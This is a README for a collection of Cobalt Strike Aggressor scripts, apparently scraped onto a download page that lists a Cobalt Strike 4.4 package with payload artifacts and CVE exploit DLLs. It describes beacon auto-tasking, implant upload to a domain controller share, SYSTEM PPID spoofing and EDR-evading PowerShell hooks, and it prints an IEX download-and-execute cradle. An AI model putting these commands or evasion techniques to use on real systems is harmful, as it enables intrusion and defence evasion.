## cobalt-arsenal
My published set of Aggressor Scripts for Cobalt Strike 4.0+
- **`Beacon_Initial_Tasks.cna`** - This script lets you configure **commands that should be launched as soon as the Beacon checks-in for the first time**. Both commands and argue settings are available in a dedicated options dialog. Also, a feature to right-click on a Beacon and issue "Run custom command..." was added to allow to run arbitrary commands against multiple beacons. Settings are then save in file specified in a global variable named:
`$beaconInitialTasksSettingsFile`
*How it works?*
Implementation of `beacon_task()` functionality to invoke nearly-arbitrary Cobalt Strike commands
from a passed string, from within your Aggressor scripts:
```
beacon_task($bid, "execute-assembly C:\\tools\\Rubeus.exe hash /password:test");
```
- **`better-upload.cna`** - Simple yet **super handy** script that overrides built-in `upload` command by having one that offers additional, second parameter - being _remote file path_. By default we're only able to upload file to the CWD. This implementation let's us upload wherever we like. Additionally, it computes and prints out the MD5 checksum of every uploaded file for facilitating IOCs tracing:
```
beacon> upload implant.exe \\DC1\c$\windows\temp\implant.exe
[*] Tasked Beacon to upload file (size: 929.25KB, md5: 6465bb8a4af8dd2d93f8f386a16be341) from: (implant.exe) to: (\\DC1\c$\windows\temp\implant.exe)
[+] host called home, sent: 951655 bytes
```
- **`cwd-in-beacon-status-bar.cna`** - Simple Beacon console status bar enhancement showing Beacon's last known current working directory path, as well as adding fixed-width to last-seen meter. Additionally, this script enhances `cd` command to make it restore previous path if `cd -` was issued (and previous path is known).
- **`custom-powershell-hooks.cna`** - This script introduces several different methods for Powershell download and execution primitives, other than Cobalt Strike's default `(Net.WebClient).DownloadString` and `IEX()`:
```
set POWERSHELL_DOWNLOAD_CRADLE {
return "IEX (New-Object Net.Webclient).DownloadString(' $+ $1 $+ ')";
}
[...]
set POWERSHELL_COMMAND {
[...]
return "powershell -nop -w hidden -encodedcommand $script";
}
```
Aforementioned methods are heavily flagged these days by EDRs and AVs so we would prefer to avoid their use. It so happens that Cobalt Strike by default embeds them excessively, generating lot of noise in such systems. We can tell Cobalt Strike to structure it's Powershell use patterns differently. However, some of introduced custom methods may not work. In such situations, we can always switch back to battle tested Cobalt Strike defaults by setting `$USE_UNSAFE_ENCODEDCOMMAND_AND_IEX = 2;` in the script's header.
- **`FilesColor.cna`** - Color Coded Files Listing. Similar to `ProcessColor.cna` by [@r3dQu1nn](https://github.com/harleyQu1nn/AggressorScripts) this script colorizes file listing outputs based on file type and extension. **It also tries to keep track of uploaded files to have them highlighted in files listing as well**. The Colors scheme information will be showed only three times by default, unless configured otherwise via global variable named `$TIMES_TO_DISPLAY_COLORS_SCHEME`.
![FilesColor example](https://raw.githubusercontent.com/mgeeky/cobalt-arsenal/master/img/1.PNG)
- **`Forwarded_Ports.cna`** - Keeps track of configured remote port forwardings on all Beacons and lets kill them easily. Available in `View -> Remote Forwarded Ports`
Using `rportfwd` here and there quickly consumes pool of available local ports from which to forward traffic outbound and keeping track of them manually becomes tedious on a long-haul projects. This script aims to fill that gap by collecting these commands and presenting them in a nice visualization pane (concept & implementation based on previous work of @ramen0x3f [leave_no_trace](https://github.com/ramen0x3f/AggressorScripts/blob/master/leave_no_trace.cna), @001SPARTaN and @r3dqu1nn [logvis.cna](https://github.com/invokethreatguy/AggressorCollection/blob/master/harleyQu1nn/logvis.cna) ).
- **`hash.cna`** - Implementation of MD5/SHA1/SHA256 hashing routines in aggressor script.
- **`Highlight_Beacons.cna`** - Highlights Beacons for a specified time duration (`$HIGHLIGHT_DURATION`) on Initial check-in event, when exiting (and after Beacon exited) and after each Beacon command's output. Configurable colors and events found in `%HIGHLIGHTS` dictionary. Hint: Specify `output => ""` to disable highlighting new Beacon command outputs.
- **`httprequest.cna`** - Safe & sound HTTP request implementation for Cobalt Strike 4.0 Aggressor Script. Works with HTTP & HTTPS, GET/POST/etc. + redirections. Rationale: I've tested various implementations of HTTP request sending subroutines written in Sleep for CS, but none of them matched by needs - working support for GET/POST, redirections handling and exceptions-safe execution. So I came up with my own implementation. ([gist](https://gist.github.com/mgeeky/2d7f8c2a6ffbfd23301e1e2de0312087))
- **`Payload_Variants_Generator.cna`** - This script generates stageless payload variants per each available architecture and output format type. Compatible with Cobalt Strike 4.0+.
- **`parse-error-codes.cna`** - A handy script that parses reported error codes and prints their corresponding Windows related meaning directly in Beacon's console output.
**From:**
```
beacon> ls C:\gdgsdfgdf
[-] could not open C:\gdgsdfgdf\*: 3
```
**To:**
```
beacon> ls C:\gdgsdfgdf
[-] could not open C:\gdgsdfgdf\*: 3. Parsed error code:
3 - ERROR_PATH_NOT_FOUND
```
- **`rename-beacon-tabs.cna`** - Script that lets us rename Beacon-related tabs from a default format of: `Beacon <ip>@<pid>` to anything other we like, for instance: `B: <user>@<computer> (<pid>)`.
Format deciding how should each Beacon's tab be named, utilising beacon's metadata fields is described in a global variable named $beacon_tab_name_format . That variable may contain any of the following available beacon's metadata keys (CobaltStrike 4.2):
`note, charset, internal , alive, session, listener, pid, lastf, computer, host,
is64, id, process, ver, last, os, barch, phint, external, port, build, pbid, arch,
user, _accent`
- **`settings.cna`** - Script that offers sample implementation for `saveOptions` and `loadOptions` routines, intended to store & restore settings from an external file.
- **`smart-autoppid.cna`** - Autoppid - script that smartely invokes PPID for every new checkin in Beacon. PPID command requires invoked Beacon to have the same Integrity level as the process it want's to assume as it's Parent. That's due to how InitializeProcThreadAttributeList with PROC_THREAD_ATTRIBUTE_PARENT_PROCESS works. In order to avoid harcoded explorer.exe PID assumption, we can look around for a configurable process name and then try to find that process running on the highest available for us integrity level. In that case, unprivileged user would assume PPID of for instance svchost.exe running as that user, wherease the privileged one - could go for the svchost.exe running as NT AUTHORITY\SYSTEM. We aim to smartely pick the most advantageous target, in a dynamic fashion.
The same command is also exposed as an alias:
```
beacon> autoppid
[*] Tasked Beacon to find svchost.exe running as SYSTEM and make it the PPID.
[.] host called home, sent: 12 bytes
Future post-ex jobs will be spawned with fake PPID set to:
svchost.exe 604 700 x64 NT AUTHORITY\SYSTEM 0
[*] Tasked beacon to spoof 700 as parent process
[.] host called home, sent: 12 bytes
```
没有合适的资源?快使用搜索试试~ 我知道了~
资源详情
资源评论
资源推荐
收起资源包目录
CobaltStrike4.4.zip (323个子文件)
compress.ps1.save.1 205B
agscript 126B
c2lint.bat 148B
agscript.bat 145B
peclone.bat 145B
update.bat 103B
.cobaltstrike.beacon_keys 1KB
patch (copy 1).c 3KB
patch.c 3KB
bypass-pipe.c 2KB
bypass-pipe (copy 1).c 2KB
injector.c 2KB
svcmain.c 2KB
injector.c 2KB
bypass-readfile.c 1KB
bypass-peek.c 1KB
dllmain.c 1KB
bypass-template.c 1KB
start_thread.c 971B
start_thread.c 837B
main.c 361B
c2lint 144B
parse-error-codes.cna 343KB
moveDialogs.cna 45KB
MoveKit.cna 30KB
Beacon_Initial_Tasks.cna 26KB
moveCommands.cna 15KB
elevate.cna 9KB
Forwarded_Ports.cna 9KB
settings.cna 8KB
FilesColor.cna 7KB
custom-powershell-hooks.cna 7KB
Payload_Variants_Generator.cna 6KB
smart-autoppid.cna 4KB
resources.cna 4KB
Highlight_Beacons.cna 4KB
cwd-in-beacon-status-bar.cna 3KB
better-upload.cna 3KB
rename-beacon-tabs.cna 3KB
httprequest.cna 2KB
helpMenus.cna 2KB
artifact.cna 2KB
artifact.cna 2KB
artifact.cna 2KB
artifact.cna 2KB
hash.cna 912B
applet.cna 400B
applet.cna 389B
payloadGen.cna 83B
cobaltstrike 112B
config 274B
config 269B
config 266B
FileWrite.cs 26KB
ExcelDCOM.cs 3KB
service-custom-nonpre.cs 2KB
installutil.cs 2KB
custom-nonpre.cs 1KB
EventSub.cs 18B
msbuild.csproj 2KB
dllmain.def 84B
injector.def 26B
description 73B
description 73B
description 73B
winvnc.x64.dll 366KB
artifact32big.dll 305KB
artifact64big.x64.dll 305KB
artifact64big.x64.dll 279KB
artifact64big.x64.dll 279KB
artifact64big.x64.dll 279KB
artifact32big.dll 279KB
artifact32big.dll 278KB
artifact32big.dll 278KB
CVE-2020-0796.x64.dll 92KB
cve-2016-0051.x86.dll 89KB
cve-2014-4113.x64.dll 84KB
cve-2015-1701.x64.dll 83KB
cve-2014-4113.x86.dll 72KB
cve-2015-1701.x86.dll 71KB
artifact32.dll 41KB
artifact64.x64.dll 41KB
main64.dll 16KB
artifact64.x64.dll 15KB
artifact64.x64.dll 15KB
artifact64.x64.dll 15KB
artifact32.dll 15KB
artifact32.dll 14KB
artifact32.dll 14KB
main.dll 14KB
script.example 2KB
exclude 240B
exclude 240B
exclude 240B
artifact64svcbig.exe 306KB
artifact32svcbig.exe 305KB
artifact64big.exe 305KB
artifact32big.exe 303KB
artifact64svcbig.exe 282KB
artifact64svcbig.exe 282KB
共 323 条
- 1
- 2
- 3
- 4
Tcotl
- 粉丝: 2
- 资源: 2
上传资源 快速赚钱
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助
最新资源
- STM32单片机FPGA毕设电路原理论文报告一种具有传统中医针刺补泻手法的新型智能电针仪设计
- 2023-04-06-项目笔记 - 第七十七阶段 - 4.4.2.75全局变量的作用域-75 -2024.03.19
- VuforiaObjectScanner-8-3-8.apk.1.1.1
- 上下班打卡_日报_20240201-20240319.xlsx
- 创业天下3.5.500.apk
- POD-data.mat
- ZF逆变器课程电子档及源码
- FileZilla-3.66.5-win64-sponsored2-setup
- SourceTreeSetup-3.4.17
- Docker Desktop Installer
资源上传下载、课程学习等过程中有任何疑问或建议,欢迎提出宝贵意见哦~我们会及时处理!
点击此处反馈
安全验证
文档复制为VIP权益,开通VIP直接复制
信息提交成功
评论1